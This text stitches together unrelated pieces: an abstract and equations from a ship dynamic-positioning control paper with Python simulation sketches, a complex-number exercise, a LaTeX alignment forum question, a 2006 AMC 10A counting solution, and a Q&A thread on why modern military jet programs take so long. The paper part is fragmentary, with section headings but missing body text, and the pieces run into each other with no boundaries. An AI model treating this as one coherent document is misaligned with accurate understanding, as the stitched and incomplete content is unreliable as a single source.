Abstract: For ship dynamic positioning control systems on offshore platforms, and in view of the advantages of back-stepping sliding mode control and the extended state observer, a back-stepping sliding mode control method for ship dynamic positioning based on an extended state observer is proposed. Considering unknown external disturbances and uncertainty in the ship model parameters, the system is divided into an inner-loop observer and an outer-loop controller. First, the extended state observer is used to estimate the unknown states and uncertainties of the system, which are then compensated in the outer-loop back-stepping sliding mode control; finally, the Lyapunov method is used to prove the stability of the system. Ship point-control simulation experiments show that the back-stepping sliding mode controller based on the extended state observer has strong robustness and good control performance, and can make the ship's surge position, sway position and yaw angle converge to their expected values. It effectively suppresses the chattering problem of conventional sliding mode control and is beneficial to engineering applications on ships.
Key words: dynamic positioning control; extended state observer; back-stepping sliding mode control
0 Introduction
1 Ship mathematical model
Fig. 1 Geodetic coordinate system and ship coordinate system
$\left\{ \begin{array}{l} \dot \eta = R\left( \psi \right)\nu ,\\ M\dot \nu+D\nu = {R^{\rm T}}(\psi )b+\tau . \end{array} \right.$ (1)
$\begin{array}{l} { R}(\psi ) = \left[ {\begin{array}{*{20}{l}} {\cos \psi } & { - \sin \psi } & 0\\ {\sin \psi } & {\cos \psi } & 0\\ 0 & 0 & 1 \end{array}} \right],\\ { M} = \left[ {\begin{array}{*{20}{c}} {m - {X_{\dot u}}} & 0 & 0\\ 0 & {m - {Y_{\dot v}}} & {m{x_g} - {Y_{\dot r}}}\\ 0 & {m{x_g} - {N_{\dot v}}} & {{I_z} - {N_{\dot r}}} \end{array}} \right],\\ { D} = \left[ {\begin{array}{*{20}{c}} { - {X_u}} & 0 & 0\\ 0 & { - {Y_v}} & { - {Y_r}}\\ 0 & { - {N_v}} & { - {N_r}} \end{array}} \right]. \end{array}$
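As a minimal sketch of the model in Eq. (1) (my own illustration; the state ordering η = (x, y, ψ), ν = (u, v, r) is an assumption):

import numpy as np

def rot(psi):
    # Rotation matrix R(psi) of Eq. (1), body frame to earth frame.
    c, s = np.cos(psi), np.sin(psi)
    return np.array([[c, -s, 0.0],
                     [s,  c, 0.0],
                     [0.0, 0.0, 1.0]])

def ship_derivatives(eta, nu, tau, b, M, D):
    # Eq. (1): eta_dot = R(psi) nu,  M nu_dot + D nu = R^T(psi) b + tau.
    R = rot(eta[2])
    eta_dot = R @ nu
    nu_dot = np.linalg.solve(M, R.T @ b + tau - D @ nu)
    return eta_dot, nu_dot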
2 Design of the back-stepping sliding mode variable structure control system based on the extended state observer
2.1 Design of the extended state observer
$\left\{ \begin{array}{l} {x^{\left( n \right)}} = f\left( {x,{x^{\left( 1 \right)}}, \cdots ,{x^{\left( {n - 1} \right)}},t} \right)+w\left( t \right)+bu ,\\ y = x\left( t \right). \end{array} \right.$ (2)
Let $a\left( t \right) = f\left( {x,{x^{\left( 1 \right)}}, \cdots ,{x^{\left( {n - 1} \right)}},t} \right)+w\left( t \right)$; then the general form of the $(n+1)$-order ESO is:
$\left\{ \begin{array}{l} {{\dot z}_1} = {z_2} - {g_1}\left( {{z_1} - x\left( t \right)} \right),\\ \vdots \\ {{\dot z}_n} = {z_{n+1}} - {g_n}\left( {{z_1} - x\left( t \right)} \right)+bu ,\\ {{\dot z}_{n+1}} = - {g_{n+1}}\left( {{z_1} - x\left( t \right)} \right). \end{array} \right.$ (3)
$\begin{array}{l} fal\left( {\varepsilon ,\alpha ,\delta } \right) = \left\{ \begin{array}{l} {\left| \varepsilon \right|^\alpha }sat\left( \varepsilon \right),\left| \varepsilon \right| > \delta ,\\ sign\left( \varepsilon \right),\left| \varepsilon \right| \leqslant \delta , \end{array} \right.\\ sat\left( \varepsilon \right) = \left\{ \begin{array}{l} \varepsilon /\varsigma ,\left| \varepsilon \right| \leqslant \varsigma ,\\ sign\left( \varepsilon \right),\left| \varepsilon \right| > \varsigma . \end{array} \right. \end{array}$ (4)
$\left\{ \begin{array}{l} {{\dot z}_1} = {z_2} - {\beta _1}{\varepsilon _1},\\ {{\dot z}_2} = {z_3} - {\beta _2}fal\left( {{\varepsilon _1},{\alpha _1},\delta } \right)+bu,\\ {{\dot z}_3} = - {\beta _3}fal\left( {{\varepsilon _1},{\alpha _2},\delta } \right). \end{array} \right.$ (5)
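A minimal discrete-time sketch of the third-order ESO in Eq. (5) (my own illustration; the linear interior branch of fal is the common textbook form and an assumption here — the paper's Eq. (4) uses a sat-based variant):

import numpy as np

def fal(eps, alpha, delta):
    # Nonlinear gain function: power law outside |eps| <= delta,
    # linear inside (assumed form, to limit chattering near zero).
    if abs(eps) <= delta:
        return eps / (delta ** (1.0 - alpha))
    return (abs(eps) ** alpha) * np.sign(eps)

def eso_step(z, y, u, b, betas, alphas, delta, dt):
    # One explicit Euler update of Eq. (5); z = (z1, z2, z3) estimates
    # the output, its derivative and the lumped disturbance a(t).
    z1, z2, z3 = z
    e1 = z1 - y
    dz1 = z2 - betas[0] * e1
    dz2 = z3 - betas[1] * fal(e1, alphas[0], delta) + b * u
    dz3 = -betas[2] * fal(e1, alphas[1], delta)
    return (z1 + dt * dz1, z2 + dt * dz2, z3 + dt * dz3)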
2.2 Design of the back-stepping sliding mode controller
${ M}{{ R}^{ - 1}}\left( \varphi \right)\ddot \eta+{ M}{\dot { R}^{ - 1}}\left( \varphi \right)\dot \eta+{ D}{{ R}^{ - 1}}\left( \varphi \right)\dot \eta = \tau+d\left( t \right),$ (6)
$\ddot \eta = { A}\dot \eta+{ B}\left( {\tau+d\left( t \right)} \right),$ (7)
Let ${v^*} \!=\! { R}\left( \varphi \right)v \Rightarrow \dot \eta \!=\! {v^*}$; a simple rearrangement of Eq. (1) then gives:
$\left\{ \begin{array}{l} \dot \eta = {v^*},\\ {{\dot v}^*} = { A}{v^*}+{ B}\left( {\tau+d\left( t \right)} \right). \end{array} \right.$ (8)
1) The ship trajectory tracking error is ${z_1} = \eta - {\eta _d}$, where ${\eta _d}$ is the ship's target position; then ${\dot z_1} = {v^*} - {\dot \eta _d}$.
${V_1} = \frac{1}{2}z_1^2,$ (9)
With the virtual error defined as ${z_2} = {\dot z_1}+{c_1}{z_1}$ (cf. Eq. (12)), differentiating gives
${\dot V_1} = {z_1}{\dot z_1} = {z_1}{z_2} - {c_1}z_1^2,$ (10)
$\sigma = {k_1}{z_1}+{z_2}.$ (11)
$\sigma \!=\! {k_1}{z_1} \!+\! {z_2} \!=\! {k_1}{z_1} \!+\! {\dot z_1}+{c_1}{z_1} = \left( {{k_1}+{c_1}} \right){z_1}+{\dot z_1}.$ (12)
2) Define the Lyapunov function:
${V_2} = {V_1}+\frac{1}{2}{\sigma ^2},$ (13)
$\begin{split}\\[-12pt] {{\dot V}_2} = & {{\dot V}_1}+\sigma \dot \sigma = {z_1}{z_2} - {c_1}z_1^2+\sigma \dot \sigma = \\ & {z_1}{z_2} - {c_1}z_1^2+\sigma \left( {{k_1}{{\dot z}_1}+{{\dot z}_2}} \right) = \\ & {z_1}{z_2} \!-\! {c_1}z_1^2 \!+\! \sigma \left( {{k_1}\left( {{z_2} \!-\! {c_1}{z_1}} \right) \!+\! {v^*} \!-\! {{\ddot \eta }_d} \!+\! {c_1}{{\dot z}_1}} \right) = \\ & {z_1}{z_2}\! - \!{c_1}z_1^2 \!+\! \sigma \left( {{k_1}\left( {{z_2} \!-\! {c_1}{z_1}} \right) \!+\! A\left( {{z_2} \!+\! {{\dot \eta }_d} \!-\! {c_1}{z_1}} \right)} +\right.\\ & \left. { Bu+F - {{\ddot \eta }_d}+{c_1}{{\dot z}_1}} \right). \end{split}$ (14)
$\begin{split}\\[-12pt] u = & {{ B}^{ - 1}}\left( { - {k_1}\left( {{z_2} - {c_1}{z_1}} \right) - A\left( {{z_2}+{{\dot \eta }_d} - {c_1}{z_1}} \right) - } \right.\\ & \left. {\bar F{\mathop{\rm sgn}} \left( \sigma \right)+{{\ddot \eta }_d} - {c_1}{{\dot z}_1} - h\left( {\sigma+\beta {\mathop{\rm sgn}} \left( \sigma \right)} \right)} \right). \end{split}$ (15)
3 System stability analysis
$\begin{split}\\[-12pt] {{\dot V}_2} = & {z_1}{z_2} - {c_1}z_1^2 - h{\sigma ^2} - h\beta \left| \sigma \right|+F\sigma - \\ & \bar F\left| \sigma \right| \leqslant - {c_1}z_1^2+{z_1}{z_2} - h{\sigma ^2} - h\beta \left| \sigma \right|\text{,} \end{split}$ (16)
${ Q} = \left[ {\begin{array}{*{20}{c}} {{c_1}+hk_1^2} & {h{k_1} - \frac{1}{2}}\\ {h{k_1} - \frac{1}{2}} & h \end{array}} \right]\text{,}$ (17)
$\begin{split}\\[-12pt] {z^{\rm T}}{ Q}z = & \left[ \!\!\!{\begin{array}{*{20}{c}} {{z_1}} & {{z_2}} \end{array}}\!\! \right]\left[ \!\!{\begin{array}{*{20}{c}} {{c_1}+hk_1^2} & {h{k_1} - \frac{1}{2}}\\ {h{k_1} - \frac{1}{2}} & h \end{array}} \!\! \right]{\left[ \!\!{\begin{array}{*{20}{c}} {{z_1}} & {{z_2}} \end{array}}\!\! \right]^{\bf T}}= \\ & {\rm{ }} {c_1}z_1^2 - {z_1}{z_2}+hk_1^2z_1^2+2h{k_1}{z_1}{z_2}+hz_2^2 =\\ & {\rm{ }} {c_1}z_1^2 - {z_1}{z_2}+h{\sigma ^2}\text{,} \end{split}$ (18)
${\dot V_2} \leqslant - {z^{\bf T}}{ Q}z - h\beta \left| \sigma \right| \leqslant 0 \text{,}$ (19)
$\left| { Q} \right| = h\left( {{c_1}+hk_1^2} \right) - {\left( {h{k_1} - \frac{1}{2}} \right)^2} = h\left( {{c_1}+{k_1}} \right) - \frac{1}{4}.$ (20)
4 Simulation study and results
$\begin{array}{l} { M} = \left[ {\begin{array}{*{20}{c}} {0.9270} & 0 & 0\\ 0 & {1.7502} & { - 0.1754}\\ 0 & { - 0.1754} & {0.1578} \end{array}} \right] ,\\ { D} = \left[ {\begin{array}{*{20}{c}} {0.0558} & 0 & 0\\ 0 & {0.1183} & { - 0.0402}\\ 0 & { - 0.0151} & {0.0506} \end{array}} \right]. \end{array}$
Fig. 2 Output of the ship surge position
Fig. 3 Output of the ship sway position
Fig. 4 Output of the ship yaw angle
Fig. 5 Trajectory of the ship motion
Fig. 6 Ship control forces and moments
Fig. 7 Observed values of the external disturbances
5 Conclusion
|
|
• mathslover
If $$z_1$$ and $$z_2$$ are two complex numbers such that $$|\frac{z_1 - z_2}{z_1 + z_2}| =1$$ , prove that, $$\frac{iz_1}{z_2}=k$$ is a real number. Find the angle between the lines from the origin to the points $$z_1 + z_2$$ and $$z_1 - z_2$$ in terms of k.
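A sketch of the first part (added for clarity, not from the original post): squaring the given condition and expanding with conjugates gives $$|z_1-z_2|^2=|z_1+z_2|^2 \Rightarrow z_1\bar z_2+\bar z_1 z_2=0 \Rightarrow \operatorname{Re}(z_1\bar z_2)=0,$$ so $$z_1/z_2 = z_1\bar z_2/|z_2|^2$$ is purely imaginary, and hence $$iz_1/z_2$$ is real.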
Mathematics
|
|
Multiple alignment points in LaTeX
1. Feb 16, 2012
Fredrik
Staff Emeritus
If I have two strings of equalities within the same align or alignat environment, and the first one is long enough to need two lines, I would want the result to look like
Code (Text):
A+B+C=D=E
     =F=G=H
I=J
rather than
Code (Text):
A+B+C=D=E
     =F=G=H
    I=J
Is there a way to do this? I suppose it can be done with an array, but I thought either align or alignat would be able to handle this. I get garbage results like these:
\begin{alignat}{3}
&F_k &=(f\chi_E)^{-1}(v_k)=\{x\in X|f(x)\chi_E(x)=v_k\}=\{x\in X|f(x)=v_k\}\cap E\\
&&=f^{-1}(v_k)\cap E=E_k\cap E\in\Sigma,\\
&\mu\big(F_k)=\mu(E_k\cap E)\leq\mu(E_k)<\infty.
\end{alignat}
\begin{alignat}{4}
&F_k && =(f\chi_E)^{-1}(v_k) =\{x\in X|f(x)\chi_E(x)=v_k\}=\{x\in X|f(x)=v_k\}\cap E\\
&&&=f^{-1}(v_k)\cap E=E_k\cap E\in\Sigma,\\
&\mu\big(F_k)=\mu(E_k\cap E)\leq\mu(E_k)<\infty.
\end{alignat}
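One possible fix (a sketch, assuming the amsmath package): give the long chain its own alignment point by wrapping it in an aligned box, and left-align both groups at a single outer alignment point, so the second equality is not forced onto the first group's column:
Code (Text):
\begin{align}
&\begin{aligned}
F_k &= (f\chi_E)^{-1}(v_k)=\{x\in X\,|\,f(x)\chi_E(x)=v_k\}=\{x\in X\,|\,f(x)=v_k\}\cap E\\
    &= f^{-1}(v_k)\cap E=E_k\cap E\in\Sigma,
\end{aligned}\\
&\mu\big(F_k\big)=\mu(E_k\cap E)\leq\mu(E_k)<\infty.
\end{align}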
|
|
# 2006 AMC 10A Problems/Problem 21
## Problem
How many four-digit positive integers have at least one digit that is a $2$ or a $3$?
$\textbf{(A) } 2439\qquad\textbf{(B) } 4096\qquad\textbf{(C) } 4903\qquad\textbf{(D) } 4904\qquad\textbf{(E) } 5416$
## Solution 1 (Complementary Counting)
Since we are asked for the number of positive $4$-digit integers with at least one $2$ or $3$ in them, we can find this by finding the total number of $4$-digit integers and subtracting off those which do not have any $2$s or $3$s as digits.
The total number of $4$-digit integers is $9 \cdot 10 \cdot 10 \cdot 10 = 9000$, since we have $10$ choices for each digit except the first (which can't be $0$).
Similarly, the total number of $4$-digit integers without any $2$ or $3$ is $7 \cdot 8 \cdot 8 \cdot 8 ={3584}$.
Therefore, the total number of positive $4$-digit integers that have at least one $2$ or $3$ is $9000-3584=\boxed{\textbf{(E) }5416}.$
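As a quick sanity check (not part of the contest solution), a brute-force count in Python agrees with the complementary count above:

# Count 4-digit integers containing at least one digit 2 or 3.
count = sum('2' in str(n) or '3' in str(n) for n in range(1000, 10000))
print(count)  # prints 5416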
## Solution 2 (Casework)
We proceed case by case.
Case $1$: There is ONLY one $2$ or $3$. If the $2$ or $3$ is occupying the first digit, we have $512$ arrangements. If the $2$ or $3$ is not occupying the first digit, there are $7 \cdot 8^2$ = $448$ arrangements. Therefore, we have $2(448 \cdot 3 + 512) = 3712$ arrangements.
Case $2$ : There are two $2$s OR two $3$s. If the $2$ or $3$ is occupying the first digit, we have $64$ arrangements. If the $2$ or $3$ is not occupying the first digit, there are $56$ arrangements. There are $3$ ways for the $2$ or the $3$ to be occupying the first digit and $3$ ways for the first digit to be unoccupied. There are $2(3 \cdot (56+64))$ = $720$ arrangements.
Case $3$ : There is ONLY one $2$ and one $3$. If the $2$ or the $3$ is occupying the first digit, we have $6$ types of arrangements of where the $2$ or $3$ is. We also have $64$ different arrangements for the non-$2$ or $3$ digits. We have $6 \cdot 64$ = $384$ arrangements. If the $2$ or the $3$ isn't occupying the first digit, we have $6$ types of arrangements of where the $2$ or $3$ is. We also have $56$ different arrangements for the non-$2$ or $3$ digits. We have $6 \cdot 56$ = $336$ arrangements for this case. We have $336 + 384$ = $720$ total arrangements for this case.
Notice that we already counted $3712 + 720 + 720 = 5152$ cases and we still have a lot of cases left over to count. This is already larger than the second largest answer choice, and therefore, our answer is $\boxed{\textbf{(E) }5416}$.
~Arcticturn
|
|
# Why does it take so long to develop modern military jets?
In the 1960's, it took three years to produce a flying prototype of an aircraft that flew faster than anything before, was built out of a novel construction material, used a new type of fuel, and was incredibly advanced: the Lockheed A-12. Its successor the SR-71 was the first aircraft with stealth technology applied, and stayed in service for decades.
From the Wikipedia page of the A-12:
• March 1959: a pre-design drawing differing from the final configuration
• 26 January 1960: order of 12 A-12 aircraft
• 25 April 1962: first flight of the prototype.
The F-35 program is a modern day jet platform program. It took 5 years to develop and build a winning prototype, and then 5 years more until the first flight of a production machine. It has been in the news for years for delays and cost overruns - the latest problem is with the oxygen system.
From its Wikipedia:
• The JSF development contract was signed on 16 November 1996,
• 26 October 2001 to Lockheed Martin, whose X-35 beat X-32
• 15 December 2006 F-35 first flight
• In 2012, General Norton A. Schwartz decried the "foolishness" of reliance on computer models to arrive at the final design of aircraft before flight testing has found the problems that require changes in design.
So to the uninitiated, it seems like half a century ago, the awesomest plane on earth could be delivered for service three years after finalising its design. The successor SR-71 was developed in 2 years, had the addition of the side chines for reducing radar cross-section, and was so much ahead of its time that it could stay in service for decades. Now, it takes 10 years from contract signing to first flight of a production machine that keeps experiencing design problems to the present day, and then a further 10 years to debug all problems.
The A-12 engineers faced very complicated problems as well, yet they could solve them in record time. What am I missing? Why does development take so much longer?
Edit
How about this one:
• in 1972, the Air Staff selected General Dynamics' Model 401 and Northrop's P-600 for the follow-on prototype development and testing phase.
• The first YF-16 was rolled out on 13 December 1973, and its 90-minute maiden flight was made at the Air Force Flight Test Center (AFFTC) at Edwards AFB, California, on 2 February 1974.
Update: the answer. -- Updated update: more would make the question too long, I've added an answer.
Multiple very good answers list the following:
• Fewer types expected to take on more roles
• Lack of competition
• No urgency imposed by war
• Therefore, no work force experienced in rapid solving of extremely complicated problems
• Peace-time politics having to justify budget decisions to the voters.
• Better testing and greater safety imposing more time demands.
All are very good points. The light attack aircraft with short development time is illustrative, as is this article in The Economist.
I still have great difficulty in accepting that:
• A reason would be the complexity of the problem, which is very often quoted. All aerospace problems are extremely complex, that is nothing new. But now nobody can tackle them anymore? That was the basis of my question.
• Having fewer airframe types saves cost and/or development time; this seems evidently incorrect, as pointed out in @Hephaestus Aetnaean's answer.
• That it should take twenty years to properly develop an aircraft. Upgrades during the life cycle, sure. On the number of lines of code as a reason, here is some perspective: 8 Million Lines Of Code (MLOC) compares with Firefox and the Chevy Volt, 24 MLOC with Apache Open Office.
Update 2
Additional points are made below - by writing in big black letters. Not sure if that makes the point more valid.
Cost-wise, the F-35 indeed beats Augustine's law XVI. The article in The Economist from 2010 referenced above has the predicted F-35 in the plot, according to @Hephaestus Aetnaean the cost is even lower, just below the $10^8$ dollar line:
So the year in which all of the US defence budget can buy only one aircraft may be postponed from predicted 2054 to maybe 2074?
Development-time wise (which is what the question is about), it is pointed out that F-35 development time is 2.5 times F-16 time. That is a big leap in a bit over two decades. Yes, the development time of European jets is long as well, perhaps due to the smaller defence budgets of smaller countries? Ironic that they are setting the standard in this.
Long software development time - has software engineering not developed methods to tackle large complicated problems? Especially where the problem - and solutions - increase incrementally? Does better testing and off-line simulation not allow for decoupling off of the project critical path, and therefore save time instead of requiring more? I opened up a question on Stack Exchange Software Engineering, and they mention that FireFox has 20 million lines of code.
I don't want to knock the F-35, it's indeed an awesome platform. If it ends up a capable platform for a reasonable price, that is great and I wish all the best to pilots carrying out their mission in service of their country. And perhaps the long development time and multiple news items remain only a memory.
Update 3
Too long to include in a question edit, refer to my answer below.
• @EricUrban we also have an aviation-history tag. – Federico Jun 11 '17 at 14:27
• I think the SR-71 was not so much "ahead of its time" as that it was good enough at the limited set of jobs it did that there was no need for a replacement. Though one could argue that it has mostly been replaced by something entirely different: satellites. – jamesqf Jun 11 '17 at 18:03
• This question is interesting because the same seems true of almost ALL technology these days - while model lifecycles and scaling are fast, innovation is not... – rackandboneman Jun 11 '17 at 19:47
• Your timeline is a little short for the SR-71. Preliminary work on the A-12 (precursor to the SR-71) began in 1957. – reirab Jun 12 '17 at 0:44
• I think a big part of the answer is that the looming threat of nuclear annihilation makes a good motivating factor. Note that the aircraft you reference was developed as a spy plane, to carry out recon over the USSR. – aroth Jun 12 '17 at 8:44
## 13 Answers
First of all, it took at least five years even back then, but your observation is absolutely correct. You would need to go back one more decade to find a frontline fighter that was designed within two years.
The reasons are:
• Urgency: Back then, the Cold War arms race forced both sides to continuously improve. Together with the advances in weapons and tactics, this meant that upgrading older airframes did not suffice.
• A trained workforce: Experienced engineers back then had worked on a dozen new designs (or more), so they had developed a gut feeling how to design the next one. Today, one can be lucky to have brought a single one into the air within a lifetime.
• Complexity: As aircraft become ever more expensive, their specs are mulled over for years. The time it takes to write today's specs is reflected in the sometimes contradicting demands put on a new design. Every new design has to be a Jack of all trades which will increase development time. A lot.
• Culture: Today's culture is very risk-averse. Contrast that to the Fifties, when the F-100 went supersonic on its second test flight and went on to be involved into 889 accidents, causing the death of 324 pilots over its operational career. Design and testing was much less thorough, leaving more complicated effects like flutter or fatigue to chance and accepting others like dangerous stall characteristics. Today, we evaluate and test much more because we can and try to avoid mishaps at almost all cost. That takes time.
I can't stress the importance of the second point enough. When the first aerodynamic dataset for the TKF-90 was sent to the simulation guys at MBB, it was rejected because the coefficients were obviously "wrong". As it turned out, the guy in simulation had spent his entire career with Tornado data, so this was all he knew. In my time, I tried to lobby for a cheap design just to keep people trained, but got nowhere with the beancounters running the company. For them, every engineer was the same. In their eyes, experience can be judged by an engineer's degree and company-funded training is a waste of money. See, the training issue goes all the way up to the top! If even the bosses have little idea what it takes to design a good aircraft quickly, you get what we have today.
Note that complexity not only concerns the airframe. Modern programs are mostly multinational and spread over as many constituencies as possible. The amount of coordination of such an artificially increased workforce is immense. Also, testing all states of a complex airframe takes much more time and risk management means that quick trials are impossible. Back then, the strategy was mostly trial and error, whereas today every program is tested to death to avoid any failure.
Have you ever read Augustine's Laws? This is a great book with a lot of profound insights into the military aviation business. And when even the CEO of Lockheed cannot make a dent in the system even though he has demonstrated a deep understanding of its faults, you know how little can be changed.
Because you used the SR-71 as an example: This combines all points in the extreme.
• After the U-2 incident and without working satellites, urgency was extreme. People worked almost around the clock to get the new design into operation. Contrast this with today where a flight test is postponed for the slightest risk. Delays? Who cares!
• Kelly Johnson hand-picked the best engineers from the Burbank offices and had been working on Mach 3 designs for almost a decade before. Also, the most time-consuming detail of the Blackbird family of aircraft, their engine, was ready when he started. I remember from Ben Rich's autobiography that Kelly could predict the heat load of a shockwave with only a few degrees of error just by guessing back then. To develop this kind of experience takes a lot of wind tunnel data! And he had almost complete liberty to decide how to proceed. No beancounter dared to second-guess his decisions - performance was still more important than profits. Compare that with today …
• The Blackbird family of aircraft was meant to do one thing only. Fly fast. No demands on turn rate, field length or a wide variety of external loads. Also no dozens of mission profiles, high and low, loiter and penetration, air superiority and bombing with one platform. That helped to get it out the door quickly.
That the Blackbird family was not replaced by something better was caused by … wait for it … the ever increasing cost of new designs. It simply was the last in a long line.
• I like Augustine Law XII. So the answer might be that the guys with the brilliant solutions are not there anymore? – Koyovis Jun 12 '17 at 1:43
• @Koyovis: This might indeed be a factor. The best minds are attracted by the most complex problems and hate being held back by dumber people of higher rank. Today's aviation industry is close to the perfect place to repel them. – Peter Kämpf Jun 12 '17 at 5:27
• Your comment about "every engineer was the same" is so so true in contracting. I was part of a team where management thought little of getting rid of experienced engineers at the drop of a hat just because next month's budget was slightly lower. Eventually it was my turn as a budget victim, and I knew that a few months later they would be on the market again, crying of the tech "skills gap", wondering what happened to all the skilled engineers. Of course, being a former employee was a black mark against you. We weren't even working on jets - we were doing logistics systems. – Robert Columbia Jun 12 '17 at 15:06
@RobertColumbia: And it works, in their eyes! I witnessed a program with a problem which required expert advice, but the recommended expert was too expensive, so just some engineer was hired. He failed. Five more were hired and failed, too. Ten more were hired and by chance, one of them realized what the problem was. Management congratulated themselves how successfully they had solved the problem. That they could have achieved the same at a small fraction of the time and expense never occurred to them. – Peter Kämpf Jun 12 '17 at 16:21
• Would also have to add what no one has said: there's a hell of a lot more money in project delays than there used to be. This has been covered in a lot of places but the film Why We Fight is as good a source as any. – Dave Kanter Jun 12 '17 at 18:18
There are quite a few reasons for this- technically speaking, the primary one is that the system complexity has increased tremendously. More systems mean more interfaces, more redundancies, meaning more chances of failure and more troubleshooting. The modern combat aircraft is expected to perform a wide variety of missions, which would've been performed by different aircraft in the past.
Modern combat aircraft are multirole (or omnirole, if you go by the French), expected to perform more things and better than their predecessors and last longer. Consider the case of the F-35. The aircraft is expected to perform roles performed by a variety of aircraft (F-16, A-10 and F/A-18) in different services. Compared to this, the primary mission of the SR-71 was simple- go fast undetected (fast being the primary one).
Added to this, the aircraft is expected to have systems integrated into it to enable it to be operated well into the future. Electronic systems are still a work in progress and their development costs are significant, easily eclipsing the cost involved in the development of the airframe. In fact, the electronic systems will be in development long after the airframe is finalized, resulting in R&D costs right until the aircraft is fielded (and well after that), as the customer wants to cram as many systems as possible into the airframe.
The image below shows the type and number of combat aircraft in USAF service since the 1950s.
Aircraft in USAF service; image from math.andyou.com
This clearly shows the issue- fewer modern aircraft are expected to perform better than their more numerous predecessors and it is only expected to become more severe.
There is another thing that is not obvious from the graph- the number of suppliers available. For example, in 1960, you have the F-86 Sabre made by North American, F-84 Thunderjet made by the Republic Aviation, the F-89 Scorpion made by Northrop and F-106 Delta Dart made by Convair, and this is only a partial list. Today, if the USAF wants to buy a fighter, they got Lockheed (and Boeing by a thread) and nobody else. There is no competition here.
As the selection pool decreases, it becomes more difficult for the buyer to enforce any fiscal discipline, especially when the contract is cost plus. Another thing is that the tendency to take risk goes down - no one wants to be the next one to go under by making a mistake when the costs outweigh the benefits. You have this situation where the last guy standing is sure that the government is going to fund him, as much and as long as it takes, no matter what the cost overruns are - simply because there is no plan 'B'.
There is another facet to this - if the development contracts are not continuous, i.e. back to back, the knowledge of how to develop these systems has to be re-learned every time, resulting in more delays. It is easier to build on an available knowledge base than to learn something new. The people who worked on the SR-71, for example, had already worked on the A-12 Cygnus. Skills that are not updated continuously will perish easily, especially in aerospace, where the talent pool is rather small. So, don't be surprised if the next aircraft takes more time and money to develop.
• The A-12 Cygnus looks a lot like the SR-71 and was capable of high altitude flight (90,000 feet) at top speeds of over mach 3. You could almost argue the SR-71 was a refinement. – David Schwartz Jun 11 '17 at 18:34
• So to paraphrase, the F35 is a multifunction fax-printer-scanner-toaster-wafflemaker where historically up to five different aircraft might have been used for one purpose each. – Criggie Jun 11 '17 at 20:10
• I'm skeptical that complexity is the main factor, given that the SR71 was designed with drafting machines and the titanium to build it had to secretly be acquired from the USSR. – The Thrifty Engineer Jun 11 '17 at 23:12
• @Koyovis They had hard math problems, with elegant engineering solutions. The F-35 is a significantly more complex problem with far more (literally!) moving parts to worry about. The extended state of a system increases exponentially as you add more features and that is a big challenge for engineering. – Gusdor Jun 12 '17 at 13:03
• I don't really buy this, look at the Saab Gripen's development cycle. The difference while they made mistakes, they couldn't afford to be wasteful on the same scale as the F35 program. I don't think the USA is a good example at all actually. We should be looking at arms industries that aren't so heavily politicized and propped up by their government. – Nathan Cooper Jun 13 '17 at 11:05
UPDATE:
I want to clarify/emphasize a few things in my answer.
## #1: Ultimately, the core driver of development time is growing complexity.
More advanced threats means more advanced systems, which usually means more complexity.
• Your opponent gets a bigger radar, so you need a bigger one to see him first. You add jammers to shorten his effective radar detection range; he switches to IR sensors to augment his radar; you have to reduce your IR signature (buried/insulated engines, serrated nozzles).
• He coordinates with ground controllers and their huge radars; you jam his comms; he adds anti-jam functionality to his comms; you coordinate with AWACS to extend your own detection range and add standardized comms so everyone can talk to each other.
• You go low to hide your radar signature in ground clutter; he adds Doppler filtering.
• He gets IR missiles; you get IR jammers; he gets jam-resistant IR seekers; you get lasers to burn his seekers.
• You build a more maneuverable fighter; he gets super-maneuverable dogfighting missiles that can lock on at extreme angles.
These advanced capabilities aren't optional. They're necessary for survival. Even more capability is required to actually execute a mission.
• No missile approach and warning system? You might never see the missile coming.
• No radar jammers, no laser IR jammers, no decoys? Then his missiles are more likely to hit.
• No low probability of intercept functionality (radar and comms)? Then he could detect you from long range (rendering your stealth less useful) or jam your radar.
• No ground-mapping modes? Then you have to spend more time in hostile air space looking for a target. Or you have to rely on someone else to find targets for you (now you need two aircraft).
• No integrated ground targeting pod? Then you need an external pod, which is draggier and increases your RCS.
• No stealth? No jamming? Have fun staring at long range radars and SAMs.
• No jam-resistant comms? Have fun talking to yourself.
## #2: So why not design everything incrementally?
Why not fly a quick n' dirty design, find the problems, and then fix it in the next block?
First, we still do that (to a degree). The F-22, F-35, and B-21 all have upgrade paths.
Second, that can be more expensive and time consuming than designing everything at once.
• A \$1 flaw in design costs \$10 in production and \$100 in the field. When aircraft are already so expensive, the flaws will also be expensive to fix.
• When aircraft are so complex, purely serial design/development would take forever.
• Low-rate production is inefficient/costly. Stopping production between blocks is even more costly.

But designing everything simultaneously is more complex (more balls to juggle). So there's a balance between serial and concurrent development.

## #3: Development time is counted differently

Better testing and greater safety imposing more time demands. - [from the updated question]

It's not only that modern testing is more stringent/complete/safe, but that modern development time is counted differently.

• F-16 development time is longer than it appears because the F-16 essentially entered service before testing was complete. (Remember how the tail had to be enlarged by 25% to address deep stall? That fix didn't happen until Block 15, after 329 airframes were already built.) By modern standards, the early F-16s would still be in testing.
• And USAF dissatisfaction with the F-16's (and F-15's) engine led to a bitter dispute with PW, leading to the alternate engine program. Eventually, GE engines power most F-16s today.
• The F-14 is also infamous for its bomber-derived engines, which performed poorly at high AOA. So it's not just about safety, but also basic functionality.

In comparison, there's a couple hundred F-35s around today (~300, ~210 in the field, ~90 coming out of production), more than the F-15C/D (~180), F-22 (~180), or F-15E (220+) fleets. (Some are already in service with the US Air Force and US Marine Corps, others are wrapping up testing, and still others are stateside training the initial cadre of pilots for various partner nations.) While most of them aren't in service, they're already at a more "advanced" state of testing than the F-16 was after it had already entered service.

Of course, besides safety and thoroughness, more testing/development is necessary because more complex aircraft have more things to test/develop.

## #4: Multiroles can save money and can provide more capability

I still have great difficulty in accepting that... Having fewer airframe types saves cost and/or development time, this seems evidently incorrect. - [from the updated question]

First, if two aircraft are similar enough, you might use the same aircraft to serve both roles. You develop one aircraft instead of two, theoretically cutting your development costs in half. Or you can use those savings to design a better plane. In practice, you might need to make some mods to suit different roles/customers, but the airframe and systems are [hopefully] similar enough to yield net savings (or a better aircraft). This isn't unprecedented. The YF-16 and YF-17 both fought for the same US Air Force program, but the USAF took the F-16 and the Navy developed the YF-17 into the F-18.

Second, the F-16 already does this. It already performs a variety of roles previously flown by several different types of aircraft. It's used for everything from close air support, interdiction/deep air support, and suppression of enemy air defenses, to air superiority and recon. The Super Hornet is also a potent multirole platform. Even the F-15E Strike Eagle, built for long range interdiction, has basically the same air superiority capability as the F-15C. Even the F-14 earned its "Bombcat" moniker.
